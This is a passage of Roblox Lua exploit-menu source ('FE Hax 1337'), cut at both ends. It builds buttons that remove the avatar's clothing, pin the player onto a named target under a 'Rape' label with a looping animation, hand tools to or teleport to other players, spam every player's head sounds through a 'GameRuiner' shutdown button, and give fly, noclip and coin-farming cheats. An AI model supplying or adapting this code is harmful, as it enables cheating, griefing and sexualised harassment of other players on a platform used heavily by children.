game:GetService("Players").LocalPlayer.Character.LeftHand:Destroy() game:GetService("Players").LocalPlayer.Character.LeftLowerArm:Destroy() game:GetService("Players").LocalPlayer.Character.LeftUpperArm:Destroy() game:GetService("Players").LocalPlayer.Character.RightHand:Destroy() game:GetService("Players").LocalPlayer.Character.RightLowerArm:Destroy() game:GetService("Players").LocalPlayer.Character.RightUpperArm:Destroy() else game:GetService("Players").LocalPlayer.Character.Head.Mesh:Destroy() game:GetService("Players").LocalPlayer.Character["Left Arm"]:Destroy() game:GetService("Players").LocalPlayer.Character["Right Arm"]:Destroy() end end) Username.Name = "Username" Username.Parent = Base Username.BackgroundColor3 = Color3.new(0.721569, 0.721569, 0.721569) Username.BackgroundTransparency = 0.25 Username.BorderSizePixel = 0 Username.Position = UDim2.new(0.0927419364, 0, 0.209354118, 0) Username.Size = UDim2.new(0, 403, 0, 50) Username.Font = Enum.Font.Highway Username.Text = "Username" Username.TextColor3 = Color3.new(0, 0, 0) Username.TextSize = 28 Username.TextWrapped = true Naked.Name = "Naked" Naked.Parent = Base Naked.BackgroundColor3 = Color3.new(0.0588235, 0.513726, 0.164706) Naked.BorderSizePixel = 0 Naked.Position = UDim2.new(0.0277176313, 0, 0.557128489, 0) Naked.Size = UDim2.new(0, 144, 0, 50) Naked.Font = Enum.Font.Highway Naked.Text = "Naked" Naked.TextColor3 = Color3.new(0, 0, 0) Naked.TextSize = 25 Naked.MouseButton1Down:connect(function() hummy = game:GetService("Players").LocalPlayer.Character.Humanoid pcall(function() hummy.Parent.Pants:Destroy() end) pcall(function() hummy.Parent.Shirt:Destroy() end) end) Rape.Name = "Rape" Rape.Parent = Base Rape.BackgroundColor3 = Color3.new(0.0588235, 0.513726, 0.164706) Rape.BorderSizePixel = 0 Rape.Position = UDim2.new(0.362419903, 0, 0.557128489, 0) Rape.Size = UDim2.new(0, 144, 0, 50) Rape.Font = Enum.Font.Highway Rape.Text = "Rape" Rape.TextColor3 = Color3.new(0, 0, 0) Rape.TextSize = 25 Rape.MouseButton1Down:connect(function() player = Username.Text stupid = Instance.new('Animation') stupid.AnimationId = 'rbxassetid://148840371' hummy = game:GetService("Players").LocalPlayer.Character.Humanoid pcall(function() hummy.Parent.Pants:Destroy() end) pcall(function() hummy.Parent.Shirt:Destroy() end) notfunny = hummy:LoadAnimation(stupid) notfunny:Play() notfunny:AdjustSpeed(10) while hummy.Parent.Parent ~= nil do wait() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[Username.Text].Character.HumanoidRootPart.CFrame end end) DropHats.Name = "Drop Hats" DropHats.Parent = Base DropHats.BackgroundColor3 = Color3.new(0.0588235, 0.513726, 0.164706) DropHats.BorderSizePixel = 0 DropHats.Position = UDim2.new(0.690962017, 0, 0.557128489, 0) DropHats.Size = UDim2.new(0, 144, 0, 50) DropHats.Font = Enum.Font.Highway DropHats.Text = "Drop Hats" DropHats.TextColor3 = Color3.new(0, 0, 0) DropHats.TextSize = 25 DropHats.MouseButton1Down:connect(function() for i,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren()) do if (v:IsA("Accessory")) then v.Parent = workspace end end end) GameRuiner.Name = "GameRuiner" GameRuiner.Parent = Base GameRuiner.BackgroundColor3 = Color3.new(0.0588235, 0.513726, 0.164706) GameRuiner.BorderSizePixel = 0 GameRuiner.Position = UDim2.new(0.0277424753, 0, 0.724166334, 0) GameRuiner.Size = UDim2.new(0, 144, 0, 50) GameRuiner.Font = Enum.Font.Highway GameRuiner.Text = "GameRuiner" GameRuiner.TextColor3 = Color3.new(0, 0, 0) GameRuiner.TextSize = 25 GameRuiner.MouseButton1Down:connect(function() -- Objects local GameRuiner = Instance.new("ScreenGui") local Main = Instance.new("Frame") local info = Instance.new("TextLabel") local close = Instance.new("TextButton") local username = Instance.new("TextBox") local shutdown = Instance.new("TextButton") local give = Instance.new("TextButton") local goto = Instance.new("TextButton") -- Properties GameRuiner.Name = "GameRuiner" GameRuiner.Parent = game:GetService("Players").LocalPlayer.PlayerGui Main.Name = "Main" Main.Parent = GameRuiner Main.Active = true Main.Selectable = true Main.BackgroundColor3 = Color3.new(0.0980392, 0.0980392, 0.0980392) Main.BorderColor3 = Color3.new(1, 1, 1) Main.Draggable = true Main.Position = UDim2.new(0.400000006, 0, 0.400000006, 0) Main.Size = UDim2.new(0, 400, 0, 300) info.Name = "info" info.Parent = Main info.BackgroundColor3 = Color3.new(0.4, 0.4, 0.4) info.BorderColor3 = Color3.new(1, 1, 1) info.Size = UDim2.new(0, 350, 0, 50) info.Font = Enum.Font.SourceSansLight info.FontSize = Enum.FontSize.Size32 info.Text = "GameRuiner GUI V2.0" info.TextColor3 = Color3.new(0, 0, 0) info.TextSize = 30 info.TextWrapped = true close.Name = "close" close.Parent = Main close.BackgroundColor3 = Color3.new(1, 0, 0) close.BorderColor3 = Color3.new(1, 1, 1) close.Position = UDim2.new(0, 350, 0, 0) close.Size = UDim2.new(0, 50, 0, 50) close.Font = Enum.Font.SourceSansLight close.FontSize = Enum.FontSize.Size14 close.Text = "X" close.TextColor3 = Color3.new(0, 0, 0) close.TextScaled = true close.TextSize = 14 close.TextWrapped = true username.Name = "username" username.Parent = Main username.BackgroundColor3 = Color3.new(0.901961, 0.901961, 0.901961) username.BorderColor3 = Color3.new(0, 0, 0) username.Position = UDim2.new(0, 50, 0, 100) username.Size = UDim2.new(0, 300, 0, 50) username.Font = Enum.Font.SourceSansLight username.FontSize = Enum.FontSize.Size14 username.Text = "Username" username.TextColor3 = Color3.new(0, 0, 0) username.TextScaled = true username.TextSize = 14 username.TextWrapped = true shutdown.Name = "shutdown" shutdown.Parent = Main shutdown.BackgroundColor3 = Color3.new(1, 0, 1) shutdown.BorderColor3 = Color3.new(1, 1, 1) shutdown.ClipsDescendants = true shutdown.Position = UDim2.new(0, 50, 0, 250) shutdown.Size = UDim2.new(0, 300, 0, 50) shutdown.AutoButtonColor = false shutdown.Font = Enum.Font.SourceSansLight shutdown.FontSize = Enum.FontSize.Size14 shutdown.Text = "FE Shutdown" shutdown.TextColor3 = Color3.new(0, 0, 0) shutdown.TextScaled = true shutdown.TextSize = 14 shutdown.TextWrapped = true give.Name = "give" give.Parent = Main give.BackgroundColor3 = Color3.new(0, 0.501961, 0) give.BorderColor3 = Color3.new(1, 1, 1) give.ClipsDescendants = true give.Position = UDim2.new(0, 50, 0, 175) give.Size = UDim2.new(0, 125, 0, 50) give.AutoButtonColor = false give.Font = Enum.Font.SourceSansLight give.FontSize = Enum.FontSize.Size14 give.Text = "Give" give.TextColor3 = Color3.new(0, 0, 0) give.TextScaled = true give.TextSize = 14 give.TextWrapped = true goto.Name = "goto" goto.Parent = Main goto.BackgroundColor3 = Color3.new(0, 0.501961, 0) goto.BorderColor3 = Color3.new(1, 1, 1) goto.ClipsDescendants = true goto.Position = UDim2.new(0, 225, 0, 175) goto.Size = UDim2.new(0, 125, 0, 50) goto.AutoButtonColor = false goto.Font = Enum.Font.SourceSansLight goto.FontSize = Enum.FontSize.Size14 goto.Text = "Goto" goto.TextColor3 = Color3.new(0, 0, 0) goto.TextScaled = true goto.TextSize = 14 goto.TextWrapped = true function GetPlayers(Name) if Name:lower() == "me" then return {game:GetService("Players").LocalPlayer} elseif Name:lower() == "all" then return game:GetService("Players"):GetChildren() elseif Name:lower() == "others" then local t = {} for i,v in pairs(game:GetService("Players"):GetChildren()) do if v.Name ~= game:GetService("Players").LocalPlayer.Name then table.insert(t, v) end end return t else local t = {} for i,v in pairs(game:GetService("Players"):GetChildren()) do if v.Name:sub(1, #Name):lower() == Name:lower() then table.insert(t, v) end end return t end end close.MouseButton1Down:connect(function() Main:TweenPosition(UDim2.new(0.400000006, 0, -0.5, 0), "Out", "Quad", 0.5) wait(0.5) Main:Destroy() end) give.MouseButton1Down:connect(function(X, Y) if not give:FindFirstChild('Circle') then local C = Instance.new('ImageLabel', give) C.BackgroundTransparency = 1 C.Position = UDim2.new(0, X - 0, 0, Y - 35) - UDim2.new(0, give.AbsolutePosition.X, 0, give.AbsolutePosition.Y) C.Size = UDim2.new(0, 0, 0, 0) C.ZIndex = give.ZIndex C.Image = 'rbxassetid://200182847' C.ImageColor3 = Color3.new(0.0980392, 0.0980392, 0.0980392) C.Name = 'Circle' C:TweenSizeAndPosition(UDim2.new(0, 500, 0, 500), C.Position - UDim2.new(0, 250, 0, 250), 'Out', 'Quart', 2.5) for i = 0, 1, 0.03 do C.ImageTransparency = i game:GetService('RunService').RenderStepped:wait() end C:destroy() end for a,v in pairs(GetPlayers(username.Text)) do for b,x in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren()) do if x:IsA("Tool") then x.Parent = v.Character end end end end) shutdown.MouseButton1Down:connect(function(X, Y) if not shutdown:FindFirstChild('Circle') then local C = Instance.new('ImageLabel', shutdown) C.BackgroundTransparency = 1 C.Position = UDim2.new(0, X - 0, 0, Y - 35) - UDim2.new(0, shutdown.AbsolutePosition.X, 0, shutdown.AbsolutePosition.Y) C.Size = UDim2.new(0, 0, 0, 0) C.ZIndex = shutdown.ZIndex C.Image = 'rbxassetid://200182847' C.ImageColor3 = Color3.new(0.0980392, 0.0980392, 0.0980392) C.Name = 'Circle' C:TweenSizeAndPosition(UDim2.new(0, 500, 0, 500), C.Position - UDim2.new(0, 250, 0, 250), 'Out', 'Quart', 2.5) for i = 0, 1, 0.03 do C.ImageTransparency = i game:GetService('RunService').RenderStepped:wait() end C:destroy() end while wait() do for a,v in pairs(game:GetService("Players"):GetChildren()) do if v.Character ~= nil and v.Character:FindFirstChild("Head") then for b,x in pairs(v.Character.Head:GetChildren()) do if x:IsA("Sound") then x.Playing = true end end end end end while wait() do for a,v in pairs(game:GetService("Players"):GetChildren()) do if v.Character ~= nil and v.Character:FindFirstChild("Head") then for b,x in pairs(v.Character.Head:GetChildren()) do if x:IsA("Sound") then x.Playing = true end end end end end end) goto.MouseButton1Down:connect(function(X, Y) if not goto:FindFirstChild('Circle') then local C = Instance.new('ImageLabel', goto) C.BackgroundTransparency = 1 C.Position = UDim2.new(0, X - 0, 0, Y - 35) - UDim2.new(0, goto.AbsolutePosition.X, 0, goto.AbsolutePosition.Y) C.Size = UDim2.new(0, 0, 0, 0) C.ZIndex = goto.ZIndex C.Image = 'rbxassetid://200182847' C.ImageColor3 = Color3.new(0.0980392, 0.0980392, 0.0980392) C.Name = 'Circle' C:TweenSizeAndPosition(UDim2.new(0, 500, 0, 500), C.Position - UDim2.new(0, 250, 0, 250), 'Out', 'Quart', 2.5) for i = 0, 1, 0.03 do C.ImageTransparency = i game:GetService('RunService').RenderStepped:wait() end C:destroy() end for a,v in pairs(GetPlayers(username.Text)) do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = v.Character.HumanoidRootPart.CFrame end end) end) local Flying = true Fly.Name = "Fly" Fly.Parent = Base Fly.BackgroundColor3 = Color3.new(0.0588235, 0.513726, 0.164706) Fly.BorderSizePixel = 0 Fly.Position = UDim2.new(0.362419903, 0, 0.724166334, 0) Fly.Size = UDim2.new(0, 144, 0, 50) Fly.Font = Enum.Font.Highway Fly.Text = "Fly" Fly.TextColor3 = Color3.new(0, 0, 0) Fly.TextSize = 25 Fly.MouseButton1Down:connect(function() repeat wait() until game:GetService("Players").LocalPlayer and game:GetService("Players").LocalPlayer.Character and game:GetService("Players").LocalPlayer.Character:findFirstChild("Torso") and game:GetService("Players").LocalPlayer.Character:findFirstChild("Humanoid") local mouse = game:GetService("Players").LocalPlayer:GetMouse() repeat wait() until mouse local plr = game:GetService("Players").LocalPlayer local torso = plr.Character.Torso local flying = true local deb = true local ctrl = {f = 0, b = 0, l = 0, r = 0} local lastctrl = {f = 0, b = 0, l = 0, r = 0} local maxspeed = 50 local speed = 0 function Fly() local bg = Instance.new("BodyGyro", torso) bg.P = 9e4 bg.maxTorque = Vector3.new(9e9, 9e9, 9e9) bg.cframe = torso.CFrame local bv = Instance.new("BodyVelocity", torso) bv.velocity = Vector3.new(0,0.1,0) bv.maxForce = Vector3.new(9e9, 9e9, 9e9) repeat wait() plr.Character.Humanoid.PlatformStand = true if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then speed = speed+.5+(speed/maxspeed) if speed > maxspeed then speed = maxspeed end elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then speed = speed-1 if speed < 0 then speed = 0 end end if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then bv.velocity = ((game:GetService("Workspace").CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p))*speed lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r} elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then bv.velocity = ((game:GetService("Workspace").CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p))*speed else bv.velocity = Vector3.new(0,0.1,0) end bg.cframe = game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0) until not flying ctrl = {f = 0, b = 0, l = 0, r = 0} lastctrl = {f = 0, b = 0, l = 0, r = 0} speed = 0 bg:Destroy() bv:Destroy() plr.Character.Humanoid.PlatformStand = false end mouse.KeyDown:connect(function(key) if key:lower() == "e" then if flying then flying = false else flying = true Fly() end elseif key:lower() == "w" then ctrl.f = 1 elseif key:lower() == "s" then ctrl.b = -1 elseif key:lower() == "a" then ctrl.l = -1 elseif key:lower() == "d" then ctrl.r = 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then ctrl.f = 0 elseif key:lower() == "s" then ctrl.b = 0 elseif key:lower() == "a" then ctrl.l = 0 elseif key:lower() == "d" then ctrl.r = 0 end end) Fly() end) local noclip = false Noclip.Name = "Noclip" Noclip.Parent = Base Noclip.BackgroundColor3 = Color3.new(0.0588235, 0.513726, 0.164706) Noclip.BorderSizePixel = 0 Noclip.Position = UDim2.new(0.69104898, 0, 0.724166334, 0) Noclip.Size = UDim2.new(0, 144, 0, 50) Noclip.Font = Enum.Font.Highway Noclip.Text = "Noclip" Noclip.TextColor3 = Color3.new(0, 0, 0) Noclip.TextSize = 25 Noclip.MouseButton1Down:connect(function() if Noclip == false then game:GetService("Players").LocalPlayer.Character.Humanoid:ChangeState(11) NoClip.Text = "Clip" else game:GetService("Players").LocalPlayer.Character.Humanoid:ChangeState(9) Noclip = true end end) GUILine.Name = "GUI Line" GUILine.Parent = Base GUILine.BackgroundColor3 = Color3.new(0.0823529, 0.639216, 0.219608) GUILine.BorderSizePixel = 0 GUILine.Position = UDim2.new(-0.000363619998, 0, -0.00101011992, 0) GUILine.Selectable = true GUILine.Size = UDim2.new(0, 496, 0, 12) no.Name = "no" no.Parent = GUILine no.BackgroundColor3 = Color3.new(0.0901961, 0.780392, 0.239216) no.BorderSizePixel = 0 no.Position = UDim2.new(0, 0, 1, 0) no.Size = UDim2.new(0, 496, 0, 67) FE.Name = "FE" FE.Parent = GUILine FE.BackgroundColor3 = Color3.new(1, 1, 1) FE.BackgroundTransparency = 1 FE.Position = UDim2.new(0.258244455, 0, 0.00167793036, 0) FE.Size = UDim2.new(0, 240, 0, 86) FE.Font = Enum.Font.Highway FE.Text = "FE Hax 1337" FE.TextSize = 35 GUILine_2.Name = "GUI Line" GUILine_2.Parent = Base GUILine_2.BackgroundColor3 = Color3.new(0.0823529, 0.639216, 0.219608) GUILine_2.BorderSizePixel = 0 GUILine_2.Position = UDim2.new(-0.000363620929, 0, 0.960183144, 0) GUILine_2.Size = UDim2.new(0, 496, 0, 18) no_2.Name = "no" no_2.Parent = GUILine_2 no_2.BackgroundColor3 = Color3.new(0.0901961, 0.780392, 0.239216) no_2.BorderSizePixel = 0 no_2.Position = UDim2.new(0, 0, -1.43478262, 0) no_2.Size = UDim2.new(0, 496, 0, 33) Creditz.Name = "Creditz" Creditz.Parent = GUILine_2 Creditz.BackgroundColor3 = Color3.new(1, 1, 1) Creditz.BackgroundTransparency = 1 Creditz.BorderSizePixel = 0 Creditz.Position = UDim2.new(0.00806450844, 0, -1.91666675, 0) Creditz.Size = UDim2.new(0, 488, 0, 50) Creditz.Font = Enum.Font.Highway Creditz.Text = "Credits : Stick_Smart, iVerzide and Cookie1890 for the scripts." Creditz.TextSize = 20 end) icecreasimulator.Name = "icecreasimulator" icecreasimulator.Parent = Main icecreasimulator.BackgroundColor3 = Color3.new(1, 1, 1) icecreasimulator.Position = UDim2.new(0.0158273429, 0, 0.674740493, 0) icecreasimulator.Size = UDim2.new(0, 200, 0, 25) icecreasimulator.Font = Enum.Font.SourceSans icecreasimulator.Text = "Ice Cream Simulator" icecreasimulator.TextColor3 = Color3.new(0, 0, 0) icecreasimulator.TextSize = 25 icecreasimulator.MouseButton1Down:connect(function() -- Farewell Infortality. (This is the GUI to Lua converter, if you are an asshole and dosnt understand) -- Version: 2.82 -- Instances: local FuckLickSimByDelvy = Instance.new("ScreenGui") local Frame1 = Instance.new("Frame") local Open = Instance.new("TextButton") local GUI = Instance.new("Frame") local UpFrame = Instance.new("Frame") local Title = Instance.new("TextBox") local X = Instance.new("TextButton") local Title2 = Instance.new("TextBox") local Title3 = Instance.new("TextBox") local Title4 = Instance.new("TextBox") local MainFrame = Instance.new("Frame") local CookieObby = Instance.new("TextButton") local ToyObby = Instance.new("TextButton") local JungleObby = Instance.new("TextButton") local MidnightObby = Instance.new("TextButton") local SlimeObby = Instance.new("TextButton") local MischiefObby = Instance.new("TextButton") local DoomObby = Instance.new("TextButton") local VIPZone = Instance.new("TextButton") local Skyland = Instance.new("TextButton") local Tokens = Instance.new("TextButton") local MoreSoon = Instance.new("TextButton") local ChocolateCastle = Instance.new("TextButton") local LocalScripts = Instance.new("Frame") local Btools = Instance.new("TextButton") local Walkspeed = Instance.new("TextButton") local Jumppower = Instance.new("TextButton") local NormalJpWs = Instance.new("TextButton") local Moresoon2 = Instance.new("TextButton") --Properties: FuckLickSimByDelvy.Name = "FuckLickSimByDelvy" FuckLickSimByDelvy.Parent = game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui") Frame1.Name = "Frame1" Frame1.Parent = FuckLickSimByDelvy Frame1.BackgroundColor3 = Color3.new(0.345098, 0.345098, 0.345098) Frame1.BorderColor3 = Color3.new(0.254902, 0.254902, 0.254902) Frame1.BorderSizePixel = 4 Frame1.Position = UDim2.new(0.926335812, 0, 0.459203064, 0) Frame1.Size = UDim2.new(0, 100, 0, 51) Open.Name = "Open" Open.Parent = Frame1 Open.BackgroundColor3 = Color3.new(0.203922, 0.203922, 0.203922) Open.BorderSizePixel = 0 Open.Position = UDim2.new(0.0600000024, 0, 0.117647059, 0) Open.Size = UDim2.new(0, 87, 0, 39) Open.Font = Enum.Font.Cartoon Open.Text = "Open" Open.TextColor3 = Color3.new(0, 0, 0) Open.TextSize = 15 Open.TextWrapped = true GUI.Name = "GUI" GUI.Parent = FuckLickSimByDelvy GUI.Active = true GUI.BackgroundColor3 = Color3.new(0.184314, 0.184314, 0.184314) GUI.BorderSizePixel = 0 GUI.Position = UDim2.new(-1, 0, 0.225999996, 0) GUI.Size = UDim2.new(0, 612, 0, 288) UpFrame.Name = "UpFrame" UpFrame.Parent = GUI UpFrame.Active = true UpFrame.BackgroundColor3 = Color3.new(0.219608, 0.219608, 0.219608) UpFrame.BorderSizePixel = 0 UpFrame.Position = UDim2.new(0, 0, -0.119021535, 0) UpFrame.Size = UDim2.new(0, 612, 0, 46) Title.Name = "Title" Title.Parent = UpFrame Title.BackgroundColor3 = Color3.new(0.192157, 0.192157, 0.192157) Title.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) Title.BorderSizePixel = 2 Title.Position = UDim2.new(0.361111104, 0, 0, 0) Title.Selectable = false Title.Size = UDim2.new(0, 170, 0, 43) Title.ClearTextOnFocus = false Title.Font = Enum.Font.Cartoon Title.Text = "Ice Cream Sim" Title.TextColor3 = Color3.new(1, 0.129412, 0.129412) Title.TextScaled = true Title.TextSize = 14 Title.TextStrokeColor3 = Color3.new(0.552941, 0, 0) Title.TextStrokeTransparency = 0 Title.TextWrapped = true X.Name = "X" X.Parent = UpFrame X.BackgroundColor3 = Color3.new(0.827451, 0.0156863, 0.0156863) X.BorderSizePixel = 0 X.Position = UDim2.new(0.929738581, 0, 0, 0) X.Size = UDim2.new(0, 43, 0, 43) X.Font = Enum.Font.ArialBold X.Text = "X" X.TextColor3 = Color3.new(0.443137, 0, 0) X.TextScaled = true X.TextSize = 14 X.TextWrapped = true Title2.Name = "Title2" Title2.Parent = UpFrame Title2.BackgroundColor3 = Color3.new(0.192157, 0.192157, 0.192157) Title2.BackgroundTransparency = 1 Title2.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) Title2.BorderSizePixel = 0 Title2.Position = UDim2.new(0.537717938, 0, 0.630434811, 0) Title2.Selectable = false Title2.Size = UDim2.new(0, 62, 0, 17) Title2.ClearTextOnFocus = false Title2.Font = Enum.Font.Cartoon Title2.Text = "Coin Farmer" Title2.TextColor3 = Color3.new(1, 1, 1) Title2.TextScaled = true Title2.TextSize = 11 Title2.TextStrokeColor3 = Color3.new(0.552941, 0.552941, 0.552941) Title2.TextStrokeTransparency = 0 Title2.TextWrapped = true Title3.Name = "Title3" Title3.Parent = UpFrame Title3.BackgroundColor3 = Color3.new(0.192157, 0.192157, 0.192157) Title3.BackgroundTransparency = 1 Title3.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) Title3.BorderSizePixel = 0 Title3.Position = UDim2.new(0.0147058824, 0, 0, 0) Title3.Selectable = false Title3.Size = UDim2.new(0, 86, 0, 43) Title3.ClearTextOnFocus = false Title3.Font = Enum.Font.Cartoon Title3.Text = "By: Delvy" Title3.TextColor3 = Color3.new(1, 1, 1) Title3.TextScaled = true Title3.TextSize = 11 Title3.TextStrokeColor3 = Color3.new(0.552941, 0.552941, 0.552941) Title3.TextStrokeTransparency = 0 Title3.TextWrapped = true Title4.Name = "Title4" Title4.Parent = UpFrame Title4.BackgroundColor3 = Color3.new(0.192157, 0.192157, 0.192157) Title4.BackgroundTransparency = 1 Title4.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) Title4.BorderSizePixel = 0 Title4.Position = UDim2.new(0.125817001, 0, 0.173913047, 0) Title4.Selectable = false Title4.Size = UDim2.new(0, 87, 0, 10) Title4.ClearTextOnFocus = false Title4.Font = Enum.Font.Cartoon Title4.PlaceholderColor3 = Color3.new(0.698039, 0, 0) Title4.Text = "V3RMILLION" Title4.TextColor3 = Color3.new(1, 0, 0) Title4.TextScaled = true Title4.TextSize = 11 Title4.TextStrokeColor3 = Color3.new(0.552941, 0, 0) Title4.TextStrokeTransparency = 0 Title4.TextWrapped = true MainFrame.Name = "MainFrame" MainFrame.Parent = GUI MainFrame.Active = true MainFrame.BackgroundColor3 = Color3.new(0.219608, 0.219608, 0.219608) MainFrame.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) MainFrame.BorderSizePixel = 4 MainFrame.ClipsDescendants = true MainFrame.Position = UDim2.new(0.0147058824, 0, 0.0718144625, 0) MainFrame.Size = UDim2.new(0, 493, 0, 258) CookieObby.Name = "Cookie Obby" CookieObby.Parent = MainFrame CookieObby.BackgroundColor3 = Color3.new(0.831373, 0, 0) CookieObby.BorderColor3 = Color3.new(0.45098, 0, 0) CookieObby.BorderSizePixel = 2 CookieObby.Position = UDim2.new(0.0245098043, 0, 0.047467798, 0) CookieObby.Size = UDim2.new(0, 150, 0, 38) CookieObby.Font = Enum.Font.Cartoon CookieObby.Text = "Cookie Obby" CookieObby.TextColor3 = Color3.new(0, 0, 0) CookieObby.TextScaled = true CookieObby.TextSize = 14 CookieObby.TextWrapped = true ToyObby.Name = "Toy Obby" ToyObby.Parent = MainFrame ToyObby.BackgroundColor3 = Color3.new(0.831373, 0, 0) ToyObby.BorderColor3 = Color3.new(0.45098, 0, 0) ToyObby.BorderSizePixel = 2 ToyObby.Position = UDim2.new(0.0245097615, 0, 0.427312762, 0) ToyObby.Size = UDim2.new(0, 150, 0, 39) ToyObby.Font = Enum.Font.Cartoon ToyObby.Text = "Toy Obby" ToyObby.TextColor3 = Color3.new(0, 0, 0) ToyObby.TextScaled = true ToyObby.TextSize = 14 ToyObby.TextWrapped = true JungleObby.Name = "Jungle Obby" JungleObby.Parent = MainFrame JungleObby.BackgroundColor3 = Color3.new(0.831373, 0, 0) JungleObby.BorderColor3 = Color3.new(0.45098, 0, 0) JungleObby.BorderSizePixel = 2 JungleObby.Position = UDim2.new(0.0245097615, 0, 0.617235243, 0) JungleObby.Size = UDim2.new(0, 150, 0, 38) JungleObby.Font = Enum.Font.Cartoon JungleObby.Text = "Jungle Obby" JungleObby.TextColor3 = Color3.new(0, 0, 0) JungleObby.TextScaled = true JungleObby.TextSize = 14 JungleObby.TextWrapped = true MidnightObby.Name = "Midnight Obby" MidnightObby.Parent = MainFrame MidnightObby.BackgroundColor3 = Color3.new(0.831373, 0, 0) MidnightObby.BorderColor3 = Color3.new(0.45098, 0, 0) MidnightObby.BorderSizePixel = 2 MidnightObby.Position = UDim2.new(0.0245098043, 0, 0.791653872, 0) MidnightObby.Size = UDim2.new(0, 150, 0, 38) MidnightObby.Font = Enum.Font.Cartoon MidnightObby.Text = "Midnight Obby" MidnightObby.TextColor3 = Color3.new(0, 0, 0) MidnightObby.TextScaled = true MidnightObby.TextSize = 14 MidnightObby.TextWrapped = true SlimeObby.Name = "Slime Obby" SlimeObby.Parent = MainFrame SlimeObby.BackgroundColor3 = Color3.new(0.831373, 0, 0) SlimeObby.BorderColor3 = Color3.new(0.45098, 0, 0) SlimeObby.BorderSizePixel = 2 SlimeObby.Position = UDim2.new(0.347025037, 0, 0.043591857, 0) SlimeObby.Size = UDim2.new(0, 150, 0, 38) SlimeObby.Font = Enum.Font.Cartoon SlimeObby.Text = "Slime Obby" SlimeObby.TextColor3 = Color3.new(0, 0, 0) SlimeObby.TextScaled = true SlimeObby.TextSize = 14 SlimeObby.TextWrapped = true MischiefObby.Name = "Mischief Obby" MischiefObby.Parent = MainFrame MischiefObby.BackgroundColor3 = Color3.new(0.831373, 0, 0) MischiefObby.BorderColor3 = Color3.new(0.45098, 0, 0) MischiefObby.BorderSizePixel = 2 MischiefObby.Position = UDim2.new(0.344996661, 0, 0.229638338, 0) MischiefObby.Size = UDim2.new(0, 150, 0, 39) MischiefObby.Font = Enum.Font.Cartoon MischiefObby.Text = "Mischief Obby" MischiefObby.TextColor3 = Color3.new(0, 0, 0) MischiefObby.TextScaled = true MischiefObby.TextSize = 14 MischiefObby.TextWrapped = true DoomObby.Name = "Doom Obby" DoomObby.Parent = MainFrame DoomObby.BackgroundColor3 = Color3.new(0.831373, 0, 0) DoomObby.BorderColor3 = Color3.new(0.45098, 0, 0) DoomObby.BorderSizePixel = 2 DoomObby.Position = UDim2.new(0.0224814415, 0, 0.233514279, 0) DoomObby.Size = UDim2.new(0, 150, 0, 38) DoomObby.Font = Enum.Font.Cartoon DoomObby.Text = "Doom Obby" DoomObby.TextColor3 = Color3.new(0, 0, 0) DoomObby.TextScaled = true DoomObby.TextSize = 14 DoomObby.TextWrapped = true VIPZone.Name = "VIP Zone" VIPZone.Parent = MainFrame VIPZone.BackgroundColor3 = Color3.new(0.831373, 0, 0) VIPZone.BorderColor3 = Color3.new(0.45098, 0, 0) VIPZone.BorderSizePixel = 2 VIPZone.Position = UDim2.new(0.347025067, 0, 0.427312762, 0) VIPZone.Size = UDim2.new(0, 150, 0, 39) VIPZone.Font = Enum.Font.Cartoon VIPZone.Text = "VIP Zone" VIPZone.TextColor3 = Color3.new(0, 0, 0) VIPZone.TextScaled = true VIPZone.TextSize = 14 VIPZone.TextWrapped = true Skyland.Name = "Skyland" Skyland.Parent = MainFrame Skyland.BackgroundColor3 = Color3.new(0.831373, 0, 0) Skyland.BorderColor3 = Color3.new(0.45098, 0, 0) Skyland.BorderSizePixel = 2 Skyland.Position = UDim2.new(0.347025067, 0, 0.617235243, 0) Skyland.Size = UDim2.new(0, 150, 0, 39) Skyland.Font = Enum.Font.Cartoon Skyland.Text = "SkyIsland" Skyland.TextColor3 = Color3.new(0, 0, 0) Skyland.TextScaled = true Skyland.TextSize = 14 Skyland.TextWrapped = true Tokens.Name = "Tokens" Tokens.Parent = MainFrame Tokens.BackgroundColor3 = Color3.new(0.831373, 0, 0) Tokens.BorderColor3 = Color3.new(0.45098, 0, 0) Tokens.BorderSizePixel = 2 Tokens.Position = UDim2.new(0.671568692, 0, 0.0397158861, 0) Tokens.Size = UDim2.new(0, 150, 0, 39) Tokens.Font = Enum.Font.Cartoon Tokens.Text = "Tokens & Gems" Tokens.TextColor3 = Color3.new(0, 0, 0) Tokens.TextScaled = true Tokens.TextSize = 14 Tokens.TextWrapped = true MoreSoon.Name = "MoreSoon" MoreSoon.Parent = MainFrame MoreSoon.BackgroundColor3 = Color3.new(0.831373, 0, 0) MoreSoon.BorderColor3 = Color3.new(0.45098, 0, 0) MoreSoon.BorderSizePixel = 2 MoreSoon.Position = UDim2.new(0.671568692, 0, 0.229638323, 0) MoreSoon.Size = UDim2.new(0, 150, 0, 185) MoreSoon.Font = 